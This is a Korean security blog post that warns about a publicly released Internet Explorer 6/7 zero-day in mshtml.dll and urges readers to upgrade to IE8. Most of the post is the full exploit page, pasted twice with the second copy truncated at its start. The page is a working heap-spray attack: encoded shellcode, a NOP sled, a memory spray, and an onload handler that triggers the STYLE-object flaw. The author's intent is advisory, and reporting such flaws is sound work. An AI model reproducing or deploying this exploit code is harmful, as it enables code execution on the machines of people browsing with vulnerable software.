시큐리티포커스에 올라온 버그트랙에 보면 IE7.0 취약서을 이용한 공격 익스플로잇 소스가 공개 되었습니다. 사용자 주의가 요망됩니다.
http://www.securityfocus.com/archive/1/507984/30/0/threaded
<!--
securitylab.ir
K4mr4n_st (at) yahoo (dot) com [email concealed]
-->
<!DOCTYPE HTML PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<HTML xmlns="http://www.w3.org/1999/xhtml">
<HEAD>
<script>
function load(){
var e;
e=document.getElementsByTagName("STYLE")[0];
e.outerHTML="1";
}
</script>
<STYLE type="text/css">
body{ overflow: scroll; margin: 0; }
</style>
<SCRIPT language="javascript">
var shellcode = unescape("%uE8FC%u0044%u0000%u458B%u8B3C%u057C%u0178%u8BEF%u184F%u5F8B%u
0120%u49EB%u348B%u018B%u31EE%u99C0%u84AC%u74C0%uC107%u0DCA%uC201%uF4EB%u
543B%u0424%uE575%u5F8B%u0124%u66EB%u0C8B%u8B4B%u1C5F%uEB01%u1C8B%u018B%u
89EB%u245C%uC304%uC031%u8B64%u3040%uC085%u0C78%u408B%u8B0C%u1C70%u8BAD%u
0868%u09EB%u808B%u00B0%u0000%u688B%u5F3C%uF631%u5660%uF889%uC083%u507B%u
7E68%uE2D8%u6873%uFE98%u0E8A%uFF57%u63E7%u6C61%u0063");
var bigblock = unescape("%u9090%u9090");
var headersize = 20;
var slackspace = headersize+shellcode.length;
while (bigblock.length<slackspace) bigblock+=bigblock;
fillblock = bigblock.substring(0, slackspace);
block = bigblock.substring(0, bigblock.length-slackspace);
while(block.length+slackspace<0x40000) block = block+block+fillblock;
memory = new Array();
for (x=0; x<4000; x++) memory[x] = block + shellcode;
</script>
</HEAD>
<BODY onload="load()">
</BODY>
</HTML>
securitylab.ir
K4mr4n_st (at) yahoo (dot) com [email concealed]
-->
<!DOCTYPE HTML PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<HTML xmlns="http://www.w3.org/1999/xhtml">
<HEAD>
<script>
function load(){
var e;
e=document.getElementsByTagName("STYLE")[0];
e.outerHTML="1";
}
</script>
<STYLE type="text/css">
body{ overflow: scroll; margin: 0; }
</style>
<SCRIPT language="javascript">
var shellcode = unescape("%uE8FC%u0044%u0000%u458B%u8B3C%u057C%u0178%u8BEF%u184F%u5F8B%u
0120%u49EB%u348B%u018B%u31EE%u99C0%u84AC%u74C0%uC107%u0DCA%uC201%uF4EB%u
543B%u0424%uE575%u5F8B%u0124%u66EB%u0C8B%u8B4B%u1C5F%uEB01%u1C8B%u018B%u
89EB%u245C%uC304%uC031%u8B64%u3040%uC085%u0C78%u408B%u8B0C%u1C70%u8BAD%u
0868%u09EB%u808B%u00B0%u0000%u688B%u5F3C%uF631%u5660%uF889%uC083%u507B%u
7E68%uE2D8%u6873%uFE98%u0E8A%uFF57%u63E7%u6C61%u0063");
var bigblock = unescape("%u9090%u9090");
var headersize = 20;
var slackspace = headersize+shellcode.length;
while (bigblock.length<slackspace) bigblock+=bigblock;
fillblock = bigblock.substring(0, slackspace);
block = bigblock.substring(0, bigblock.length-slackspace);
while(block.length+slackspace<0x40000) block = block+block+fillblock;
memory = new Array();
for (x=0; x<4000; x++) memory[x] = block + shellcode;
</script>
</HEAD>
<BODY onload="load()">
</BODY>
</HTML>
알려진 바로는 Microsoft HTML viewer (mshtml.dll) 와 internal style sheet (CSS/STYLE) object via document.getElementsByTagName() method 를 공격하는 것으로 나타났다. (관련글 링크 : 여기)
http://seclists.org/bugtraq/2009/Nov/148 에도 링크가 되어 있는데 백신에서 바로 감지하네요..
익스플로러 취약성 공격코드
MS 다음패치일인 12월8일에 패치 될것으로 생각되고 있고 IE8.0 에서는 이러한 취약점이 발견되지 않은 것으로 알려지고 있다. 빠른 시일내에 업그레이드를 해야만 하겠다. 참고 바랍니다.
지금 바로 IE8.0 으로 업그레이드 하시기 바랍니다.
'Security Skill&Trend' 카테고리의 다른 글
| 보안공부를 처음 하시는 분들을 위한 조언 (2) | 2009/12/12 |
|---|---|
| SSL Strip - 블랙햇 자료 (0) | 2009/11/30 |
| IE6.0, IE7.0 제로데이공격 익스플로잇 공개 (0) | 2009/11/25 |
| 아이폰 SMS & 연락처 리스트 해킹위험 (2) | 2009/11/25 |
| USB 자주쓰다보니 결국 바이러스 걸리더라 (8) | 2009/11/16 |
| 대한민국 아직도 스팸 상위국가 -소포스 시큐리티 레포트 (4) | 2009/11/10 |
